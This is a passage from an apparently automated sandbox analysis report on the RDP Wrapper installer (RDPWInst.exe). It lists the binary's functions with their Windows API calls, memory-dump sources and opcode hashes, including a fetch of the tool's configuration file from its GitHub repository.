                                                                                • Instruction Fuzzy Hash: 40B092927543401AEA0035FA0CC6F2A418CD70960AF110C3ABA42E7183D47FC8290026
                                                                                Function 00409310 Relevance: 1.3, APIs: 1, Instructions: 57stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • lstrcpynW.KERNEL32(?,00000000,?,00000000,004093AD,?,?,?,00000000), ref: 0040937A
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcpyn
                                                                                • String ID:
                                                                                • API String ID: 97706510-0
                                                                                • Opcode ID: f92199f7e57e2128dd250d54d35a9e3758d953fbac64912c85fa78ba761ebe9f
                                                                                • Instruction ID: 1f383253a52e48d77bc15eb4822a33d834d352bf49a326ca98ed7cc47a11fc89
                                                                                • Opcode Fuzzy Hash: f92199f7e57e2128dd250d54d35a9e3758d953fbac64912c85fa78ba761ebe9f
                                                                                • Instruction Fuzzy Hash: 0111C671504204EFDF21DB69CC86B9A77F8EB19754F5100BAFC40AB2D2D7B8AD008A19
                                                                                Function 00402AB2 Relevance: 1.3, APIs: 1, Instructions: 41COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00402AE3
                                                                                • VirtualQuery.KERNEL32(?,?,0000001C), ref: 00402B06
                                                                                • VirtualFree.KERNEL32(?,00000000,00008000,?,?,0000001C), ref: 00402B13
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Virtual$Free$Query
                                                                                • String ID:
                                                                                • API String ID: 778034434-0
                                                                                • Opcode ID: d2902ee949b2c85551e00087902fb7701d80a0372c0c987194a01e681a746040
                                                                                • Instruction ID: e8ddcf902efd7f78c833b1da2340b8221ccc6e4d64c13544335dcfda98f803ee
                                                                                • Opcode Fuzzy Hash: d2902ee949b2c85551e00087902fb7701d80a0372c0c987194a01e681a746040
                                                                                • Instruction Fuzzy Hash: 0CF06D343046005FD311CB19CA89B17BBE5EFC9350F15C17AE988973E5E675DC019B9A

                                                                                Non-executed Functions

                                                                                Function 0043B58C Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 107serviceCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001,00000000,0043B6CE,?,00000000), ref: 0043B5EA
                                                                                • GetLastError.KERNEL32(?,00000000,ServicesActive,00000001,00000000,0043B6CE,?,00000000), ref: 0043B5F9
                                                                                  • Part of subcall function 0043B48C: CloseServiceHandle.ADVAPI32(00000000,00000000,0043B52C,?,00000000,?,?,0043B6A3,?,00000000,00000000,?,00000000,00000000,00000010,00000000), ref: 0043B4BC
                                                                                  • Part of subcall function 0043B48C: CloseServiceHandle.ADVAPI32(00000000,00000000,0043B52C,?,00000000,?,?,0043B6A3,?,00000000,00000000,?,00000000,00000000,00000010,00000000), ref: 0043B4D1
                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000010,00000000,ServicesActive,00000001,00000000,0043B6CE,?,00000000), ref: 0043B61F
                                                                                • GetLastError.KERNEL32(?,00000000,00000000,00000010,00000000,ServicesActive,00000001,00000000,0043B6CE,?,00000000), ref: 0043B62E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Service$CloseErrorHandleLastOpen$Manager
                                                                                • String ID: $sD$...$OpenSCManager$OpenService$ServicesActive$StartService$[*] Starting
                                                                                • API String ID: 2257214823-3855835416
                                                                                • Opcode ID: 55f0df0e7310880f6e7cb70b762c89182bbbe75636a3247ae01688996091d268
                                                                                • Instruction ID: 0e693e6e1cec2ac2fe46a8ff9d209bc722a6061919d6bcedfcc5fc96e321ed9b
                                                                                • Opcode Fuzzy Hash: 55f0df0e7310880f6e7cb70b762c89182bbbe75636a3247ae01688996091d268
                                                                                • Instruction Fuzzy Hash: 6C313471A04208AEDB10FBB68842B5F77E8DB4C715F60947BF614E7283DB7C9940869E
                                                                                Function 0043CF60 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 70networkfileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • InternetOpenW.WININET(RDP Wrapper Update,00000000,00000000,00000000,00000000), ref: 0043CF9B
                                                                                • InternetOpenUrlW.WININET(00000000,https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.ini,00000000,00000000,80000000,00000000), ref: 0043CFB7
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0043CFC3
                                                                                • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0043CFDB
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0043D002
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0043D008
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Internet$CloseHandle$Open$FileRead
                                                                                • String ID: $sD$RDP Wrapper Update$https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.ini
                                                                                • API String ID: 4294395943-3115740878
                                                                                • Opcode ID: 0dd60196e7cab0bfb1fb3172ef56b337b41d75a0cde3163acb5471a059a842a1
                                                                                • Instruction ID: c5d90ac50beae541ecf0d1101a3828864360ef58c633fc88e2a86ac238cf1af1
                                                                                • Opcode Fuzzy Hash: 0dd60196e7cab0bfb1fb3172ef56b337b41d75a0cde3163acb5471a059a842a1
                                                                                • Instruction Fuzzy Hash: B611EC30A40204BAE725DB629C52F5E73B99B5CB08F21907AF500B61C1DAFC6D15965E
                                                                                Function 00408EB9 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 81stringfileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • lstrcpynW.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,?,?,?), ref: 00408E8B
                                                                                • FindFirstFileW.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,?,?,?), ref: 00408E9E
                                                                                • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,?,?,?), ref: 00408EB4
                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,?,?,?), ref: 00408EC0
                                                                                • lstrcpynW.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,?,?), ref: 00408EFC
                                                                                • lstrlenW.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,?), ref: 00408F08
                                                                                • lstrcpynW.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 00408F2B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcpyn$Findlstrlen$CloseFileFirst
                                                                                • String ID: \
                                                                                • API String ID: 426534248-2967466578
                                                                                • Opcode ID: c2c22b4f6afaac3322ec1ba7b89a81b7c1940998765c8b0d5641ec05d20bdfa1
                                                                                • Instruction ID: b362d454dc0c99aa6135db0f351dbab6b5904c2f5f97e8c1ae29e40b3cae7ae2
                                                                                • Opcode Fuzzy Hash: c2c22b4f6afaac3322ec1ba7b89a81b7c1940998765c8b0d5641ec05d20bdfa1
                                                                                • Instruction Fuzzy Hash: 2921DA72A005195BCB10EAA4CD89BEF736DEB84314F0845BBA554E32C1EA7CEA458B58
                                                                                Function 00408908 Relevance: 4.6, APIs: 3, Instructions: 100COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • IsValidLocale.KERNEL32(?,00000002,00000000,00408A6F,?,?,?,00000000), ref: 004089B4
                                                                                • GetLocaleInfoW.KERNEL32(00000000,00000059,?,00000055,?,00000002,00000000,00408A6F,?,?,?,00000000), ref: 004089D0
                                                                                • GetLocaleInfoW.KERNEL32(00000000,0000005A,?,00000055,00000000,00000059,?,00000055,?,00000002,00000000,00408A6F,?,?,?,00000000), ref: 004089E1
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Locale$Info$Valid
                                                                                • String ID:
                                                                                • API String ID: 1826331170-0
                                                                                • Opcode ID: 22c6a01b53f4869b0805d6a69e827c795f3fdd97ab41ae37c19bcf7436934d77
                                                                                • Instruction ID: a5145651339b4fb3455c536bf826b1f6d015bb6bedb64d7d22cca76e959b3329
                                                                                • Opcode Fuzzy Hash: 22c6a01b53f4869b0805d6a69e827c795f3fdd97ab41ae37c19bcf7436934d77
                                                                                • Instruction Fuzzy Hash: 4031C274A00618ABDF20EB55DD81BAF77B5EB44700F1040BBA588B72D1DA7D5E40CF5A
                                                                                Function 00414698 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetVersionExW.KERNEL32(?,00443136,00000000,0044315A), ref: 004146A6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Version
                                                                                • String ID: 8[D
                                                                                • API String ID: 1889659487-4257705004
                                                                                • Opcode ID: 4c73b04ee2d3421a5135ac7becaf35c551135d218803d44854ea7cc165e5ef2a
                                                                                • Instruction ID: 2f0940f951a798b0a8c1b92e6229d48fd5c0b6d32f60b1d075f360ba34157daa
                                                                                • Opcode Fuzzy Hash: 4c73b04ee2d3421a5135ac7becaf35c551135d218803d44854ea7cc165e5ef2a
                                                                                • Instruction Fuzzy Hash: 7DF030B8605B419FDB00DF18E845659B7E0EB89314F00483AF485D7391D738A844CB6E
                                                                                Function 0040F73C Relevance: 3.0, APIs: 2, Instructions: 23fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FindFirstFileW.KERNEL32(00000000,?,00000000,?,0040F7B7,00000000,?,00447324,0043D527,00000000,0043D55E,?,00447324,0000000B,00000000,00000000), ref: 0040F757
                                                                                • FindClose.KERNEL32(00000000,00000000,?,00000000,?,0040F7B7,00000000,?,00447324,0043D527,00000000,0043D55E,?,00447324,0000000B,00000000), ref: 0040F762
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Find$CloseFileFirst
                                                                                • String ID:
                                                                                • API String ID: 2295610775-0
                                                                                • Opcode ID: 8349d8abcabe035f766b9fd57bf523843a29f3c72d549b36151af9bdffc9284f
                                                                                • Instruction ID: 44d6f2536772e544dca19d4554f13a915e571bc99722c0a0b507a91726501656
                                                                                • Opcode Fuzzy Hash: 8349d8abcabe035f766b9fd57bf523843a29f3c72d549b36151af9bdffc9284f
                                                                                • Instruction Fuzzy Hash: B9E0CD6261470815C72065B90CC9B5B728C5B04328F040BB77D5CF35D2FA3D8554115F
                                                                                Function 0040FAE8 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?), ref: 0040FB09
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: DiskFreeSpace
                                                                                • String ID:
                                                                                • API String ID: 1705453755-0
                                                                                • Opcode ID: 061f37ac546520710da28799b67137028b65efc101c0d4d81ccfdcd92c7e26f4
                                                                                • Instruction ID: 58712635a06311b99fbeb36610203dfa2cb34c225fc8d295b9fe620e031658d4
                                                                                • Opcode Fuzzy Hash: 061f37ac546520710da28799b67137028b65efc101c0d4d81ccfdcd92c7e26f4
                                                                                • Instruction Fuzzy Hash: DC1112B5E00209AFDB04CF99C881DAFF7F9EFC8304B14C569A508E7254E6319A018B90
                                                                                Function 00412C4C Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 00412C6A
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InfoLocale
                                                                                • String ID:
                                                                                • API String ID: 2299586839-0
                                                                                • Opcode ID: 7e0a8c61708f8e5fe9311120f60f8f5fdb241708797c452f410103c20568c8cd
                                                                                • Instruction ID: 9da8dff9c55e20549594a614ff7d844013acaeb15ab394cddf5a90cc700bc9e0
                                                                                • Opcode Fuzzy Hash: 7e0a8c61708f8e5fe9311120f60f8f5fdb241708797c452f410103c20568c8cd
                                                                                • Instruction Fuzzy Hash: 69E0927170021817E314A5695C86DEB725C9B58300F00417FBA06D7387EDB89D6046ED
                                                                                Function 00412C4A Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 00412C6A
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InfoLocale
                                                                                • String ID:
                                                                                • API String ID: 2299586839-0
                                                                                • Opcode ID: ab3a7bc9c987a33d67a9bd60b42fd60c334eb7a711f5428dc5487131ec69b403
                                                                                • Instruction ID: 70141b24f99fd98ac1db3019ee377dee0462c825b9fd2fb3f3473e8324f2be5c
                                                                                • Opcode Fuzzy Hash: ab3a7bc9c987a33d67a9bd60b42fd60c334eb7a711f5428dc5487131ec69b403
                                                                                • Instruction Fuzzy Hash: 01E0DF3270031827F31495689D86EFB729C9B58300F00427BBE06D3382FDB49DA046E9
                                                                                Function 00412C98 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetLocaleInfoW.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0041524C,00000000,00415476,?,?,00000000,00000000), ref: 00412CAB
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InfoLocale
                                                                                • String ID:
                                                                                • API String ID: 2299586839-0
                                                                                • Opcode ID: c8c474e4d6c9df360d6374c6a6ae5d3dec4118d646be2418b28a4789b35754d1
                                                                                • Instruction ID: c0299d43d85d1b47cbbe3802d462e1d0899c6c80b318dcec9f9e75b03fa43e2d
                                                                                • Opcode Fuzzy Hash: c8c474e4d6c9df360d6374c6a6ae5d3dec4118d646be2418b28a4789b35754d1
                                                                                • Instruction Fuzzy Hash: 17D05EB63092202AE210525B6E45DBF56DCCBC87A2F10443BBA48C6242E268CC5693F9
                                                                                Function 00411154 Relevance: 1.5, APIs: 1, Instructions: 6timeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LocalTime
                                                                                • String ID:
                                                                                • API String ID: 481472006-0
                                                                                • Opcode ID: e8d3b386f6a7d5cca3471eaf155d8864694d2401fe0684cb90b003475a380097
                                                                                • Instruction ID: 9e8cd4c1e66a35051b5eb1694121f13696e39ccab0ec977751e8beb904ec194d
                                                                                • Opcode Fuzzy Hash: e8d3b386f6a7d5cca3471eaf155d8864694d2401fe0684cb90b003475a380097
                                                                                • Instruction Fuzzy Hash: D1A0110080882002C2803B2A0C032383080A800A30FC80BAAB8F8A02E2EA2E023088AB
                                                                                Function 00417D30 Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(oleaut32.dll), ref: 00417D39
                                                                                  • Part of subcall function 00417D04: GetProcAddress.KERNEL32(00000000), ref: 00417D1D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
